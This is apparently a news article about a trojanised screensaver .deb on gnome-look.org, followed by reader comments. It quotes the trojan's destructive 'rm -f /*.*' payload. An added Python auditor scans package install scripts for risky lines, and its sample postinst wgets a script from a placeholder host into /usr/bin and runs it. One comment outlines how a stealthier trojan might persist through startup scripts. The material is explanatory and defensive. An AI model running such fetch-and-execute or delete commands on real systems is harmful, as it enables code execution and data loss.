Carelessness busts Linux security

Summary: No operating system can ever properly protect a computer from trojans as long as users continue to do silly things. Just because Linux is immune to your standard drive-by viruses it does not mean that it can escape trojan horses.

The latest reminder to be vigilant comes via the users unfortunate enough to download and install a malicious screensaver from gnome-look.org.

Although the malicious content is now removed, the code fragments left show what the trojan's potential may have been.

The package used wget to drop a bash script into /usr/bin/ and then executed it. Originally the script's contents were a ping command, but this was later changed to:

rm -f /*.*
echo "You see this? It's changed, before it was set to ping?"

Thankfully, the delete command above is largely ineffectual on Linux systems (without -r it cannot remove directories, and the glob only matches entries directly under / whose names contain a dot). But just as Windows users need to be wary of downloads from third-party sites, so too should Linux users not trust non-repository content.
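Inspecting a third-party .deb before handing it to dpkg is one practical form of the vigilance the article asks for. The following is an added example, not code from the article or from gnome-look: it parses the package container without installing anything and flags maintainer-script lines that fetch-and-execute or force-delete, the shape of this trojan. The sample postinst, its URL and the package itself are constructed placeholders.

```python
import io, re, tarfile
# Constructed sample postinst mirroring the gnome-look trojan's shape (wget a
# script into /usr/bin, mark it executable, run it); the URL is a placeholder.
SAMPLE_POSTINST = ("#!/bin/sh\nwget -q http://example.invalid/Auto.bash -O /usr/bin/Auto.bash\n"
                   "chmod +x /usr/bin/Auto.bash\nsh /usr/bin/Auto.bash\n")
# dpkg runs these control-archive scripts as root during install/remove.
MAINTAINER_SCRIPTS = {"preinst", "postinst", "prerm", "postrm"}
# Heuristics only (expect false positives from legitimate packaging).
RISKY = [
    (r"\b(wget|curl)\b", "fetches content from the network at install time"),
    (r"\b(sh|bash)\s+/\S+|\bchmod\s+\S*x\b", "runs or marks a dropped executable"),
    (r"\brm\s+-\w*f", "force-deletes files"),
]
def ar_members(blob):
    # A .deb is an ar(1) archive: 8-byte magic, then 60-byte headers + padded data.
    assert blob[:8] == b"!<arch>\n", "not an ar archive"
    members, off = {}, 8
    while off + 60 <= len(blob):
        hdr = blob[off:off + 60]
        name = hdr[:16].decode().strip().rstrip("/")  # GNU ar may append '/'
        size = int(hdr[48:58])                         # decimal size field
        members[name] = blob[off + 60:off + 60 + size]
        off += 60 + size + (size % 2)                  # data is padded to even length
    return members

def audit_deb(blob):
    """Return (script, line_no, reason, text) for each risky maintainer-script line."""
    control = ar_members(blob)["control.tar.gz"]
    findings = []
    with tarfile.open(fileobj=io.BytesIO(control), mode="r:gz") as tar:
        for m in tar.getmembers():
            base = m.name.rsplit("/", 1)[-1]
            if base not in MAINTAINER_SCRIPTS:
                continue
            text = tar.extractfile(m).read().decode(errors="replace")
            for no, line in enumerate(text.splitlines(), 1):
                for pat, why in RISKY:
                    if re.search(pat, line):
                        findings.append((base, no, why, line.strip()))
    return findings

def _ar_member(name, data):  # one ar member: header, data, newline pad if odd length
    hdr = f"{name:<16}{0:<12}{0:<6}{0:<6}{'100644':<8}{len(data):<10}`\n".encode()
    return hdr + data + (b"\n" if len(data) % 2 else b"")
def build_sample_deb(postinst):
    # Build a minimal .deb in memory for the demo; data.tar.gz is left empty.
    control = io.BytesIO()
    with tarfile.open(fileobj=control, mode="w:gz") as tar:
        info = tarfile.TarInfo("./postinst")
        info.size, info.mode = len(postinst.encode()), 0o755
        tar.addfile(info, io.BytesIO(postinst.encode()))
    return (b"!<arch>\n" + _ar_member("debian-binary", b"2.0\n")
            + _ar_member("control.tar.gz", control.getvalue()) + _ar_member("data.tar.gz", b""))
```

Against a real download, read the file with open(path, "rb") and pass the bytes to audit_deb; an empty result is not proof of safety, only the absence of these particular patterns.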

The fix for this "infection" is rather simple, but despite the simplicity and ineffectiveness of this trojan, it should still serve as a Linux security wake-up call. Not for the operating system itself, but for the people using it.

If users continue to trust arbitrary code, then security risks will occur.

Topics: Security, Linux, Open Source

About

Chris started his journalistic adventure in 2006 as the Editor of Builder AU after originally joining CBS as a programmer. After a Canadian sojourn, he returned in 2011 as the Editor of TechRepublic Australia, and is now the Australian Editor of ZDNet.

Talkback

19 comments
  • heh - that would suck

    gotta stay vigilant - don't get lazy
    anonymous
  • and DON'T RUN AS ROOT

    nt
    anonymous
  • duh

    If the programming is as good as his use of punctuation, he'd better go back to Windows viruses.
    anonymous
  • Linux Virus Definition

    So what is the definition of a Linux Virus ?

    It's a script that could have done a lot of damage if you were a total idiot, didn't bother to read the "how to use linux" manual, somehow had someone else set the system up for you, since no one who can accomplish that task is capable of falling for this stunt, and then had the system handed over to you.

    I still don't believe it though since downloading from outside the repository is a technical exercise in itself and you'd have to be drunk and looking for trouble to do it.

    And that's what defines a Linux Virus.

    Hey, if you have to get drunk and turn off most of your security for it to hurt you, I'm not going to panic.
    anonymous
  • wow

    Actually, I'm pretty sure that would do almost nothing since it's not going to be running as root. Unless the user is THAT dumb ...

    In addition, rm -f /*.* would be less effective than rm -rf /*
    anonymous
  • linux ....

    Strictly speaking, a linux virus is the same as a windows virus .... but for linux. Meaning it replicates itself and infects other machines, or however they define viruses in general.

    And installing things from outside the repository isn't always a bad thing. Until just recently, Ubuntu had old versions of netbeans and eclipse in the repos. And even more recently, there is no version of the google chrome beta for linux in the Ubuntu Repos. So I downloaded a .deb file. Not a "technical exercise". Any windows user knows how to install an .exe. .deb is almost the same.

    Theming and the like is difficult to customize if you stick to repos as well.

    My point is, there are lots of good reasons to download software from outside the repos.

    However, it's also important to note that you should only do so from trusted sources. gnome-look.org just lost a little trustworthiness, though I do believe this has been the only time something like this has happened.

    Don't be so harsh on non-linux users. It's that kind of attitude that will prevent mainstream adoption. Maybe you don't care, but in any case, it makes linux look like a toy reserved for super-nerds.

    Also, I've never read this "how to use linux" manual, where can I get it?
    anonymous
  • will the uploader be prosecuted?

    Someone uploaded code deliberately designed to damage systems' integrity. At the very least, this needs to be investigated.
    anonymous
  • on most systems it would do nothing

    On my system and most others, that rm command would do nothing at all, since all that should be in your / directory are directories and none of them are empty (meaning that rm would not remove them) and none of them have a dot (.) in their name. So unless the person is really stupid, meaning they are running the script as root, AND have been putting files in the /, then nothing would happen.
    anonymous
  • Linux zealot?

    No, this script could have done damage to even experienced users.

    The script was executed as part of installing a deb file. Since you need root access to install a deb file, the script was also executed with root access.

    Are you saying that experienced users never install deb files from 3rd-party sources? You're misinformed if you really think so.
    anonymous
  • Carelessness busts Linux security????

    This is no different from a 3 year-old armed with a paper sword and a cardboard shield ambushing the queen and reporting it as a failed terrorist attack !!!!
    I am not a virus writer and I am not giving anyone ideas here, but I am just stating the obvious - why didn't this piece of malicious code just install itself in the users home directory, create a hidden folder and add a few entries to the user's startup scripts ? From there he could mine data or delete the users data as he wishes or search all directories in the users PATH and find what folder he has write permissions to and take it from there....

    peeved! :-)

    i thought this was a serious threat!
    anonymous
  • In addition

    Just an observation but in addition to the command being improperly written to do much of anything but get a denied error, not all distributions of GNU/Linux have WGET by default (my fedora 11 does not), granted if it were properly written and was downloaded to the home directory (I'm not sure where WGET puts its downloaded files) then the user's files might go missing but nothing else. Yet another attempt at FUD regarding the Linux security model (kinda like all those null pointer errors that require local access to the system the media loves).
    anonymous
  • SELinux!

    Once again - proof that "discretionary access control (DAC)" is obsolete in the global Internet age. Remember MULTICS / Trusted XENIX (Based on Microsoft's XENIX) and others that made "profiling" a base - no such thing as "root". A system "trojan" is simply a violation of policy and any modern OS should have been over that by now - but, of course we aren't. Re the statement:
    "No operating system can ever properly protect a computer from trojans as long as users continue to do silly things."
    WRONG! Yes it can - and it DID in the past as I mention above. Have a look at GEMSOS, for example! remember LINUX and Windows are NOT mandatory access control type OSes - and they should have been years ago (except for SELinux - of course - but who activates that?)
    anonymous
  • Incorrect

    Right. Tell that to the Netbook crowd.....Linux has over 40-50% market share there.

    And no, a linux virus isn't the same as a windows virus. For instance, there are 100's of thousands of Windows viruses and NO..none..nada..zip..zilch "in the wild" Linux viruses. Not even one.........

    That alone has to tell you something.
    anonymous
  • OSX?

    Am I mistaken, or would this run in Mac OSX as well? I know they have wget installed by default.

    Not that it'd be any more effective, the writer of that is completely stupid, but still, why is this being touted as a linux problem when in fact the same "vulnerability" exists in OSX?
    anonymous
  • Also incorrect

    It doesn't tell us anything because it is not the correct information, misleading at best.

    The statistic you mention first will change the statistic you mention second. As operating systems become more mainstream they will attract the attention of those who want to cause trouble. This has been proven time and time again.

    For a brief history on virii read: http://www.pcworld.idg.com.au/article/148676/first_computer_virus_turns_20

    In recent years we've seen malicious software written for Unix/Linux-based applications if not the Unix/Linux-based operating systems. Sendmail is probably the most vulnerable programme ever rolled out. It has more holes than a sieve. Then there's Firefox, ported to both Windows and Linux but just as vulnerable on both.

    Moving to operating systems, Windows has its problems but we are seeing an increase in security problems for OS X and mobile phone operating systems. The iPhone recently showed how vulnerable it can be.

    Yes, user settings are important. If you run a machine with full administrator privileges then there is a chance that there is a virus that can probe and exploit the weaknesses that this level of access provides. After all, administrator access is supposed to allow a legitimate user the access to perform unrestricted changes to their machines.
    anonymous
  • I wish people wouldn't use the F-word so much

    There's no criticism of the Linux security model here. Someone used a common linux distro, and downloaded a screensaver which contained a trojan. Originally it was a DDOS attack against some website.

    If the author of the trojan really wanted, he could have uploaded the users home directory to some remote location.

    That it was such a simple trojan (that worked in its original form, I might add) is just proof that using a linux distro does not equal immunity from malicious script-kiddies. It could be argued that gnome-look should have detected it before allowing it to be available from their site.
    anonymous
  • Unless the user is that dumb?

    How do you install deb files on your computer?

    I've got to admit I don't always inspect the contents of deb files, or verify the hashes of downloads.
    anonymous
  • Mitigation via Architecture

    The average person is always going to download "cool themes". There isn't much that can be done to change that.

    Screensavers will always be tricky since, by definition, they're programs. (though I'm sure bundling dozens with kscreensaver, xscreensaver, and the RSS-GLX pack, all in the distro repositories, really helps and, if someone really wanted, they could design something like Google's Native Client to sandbox screensavers)

    For other stuff, I suspect the solution will be a new, desktop-level repository system along the lines of KDE's GetHotNewStuff. That way, users don't have to choose between distro-specific (eg. deb) and potentially confusing (eg. zip/rar) and DE developers can make sure that the resource downloads (archives with metadata, bare wallpapers, or what have you) contain only what they should. (Which, for non-screensaver, non-widget resources, means sanitized metadata and no executable code) The only really tricky part I see is getting the various DE teams together on freedesktop.org to repeat the XDG .desktop file success.
    anonymous
  • NAG

    The "how to use linux" manual would probably be known as the NAG, or Network Administrator's Guide, maintained on tldp.org.
    anonymous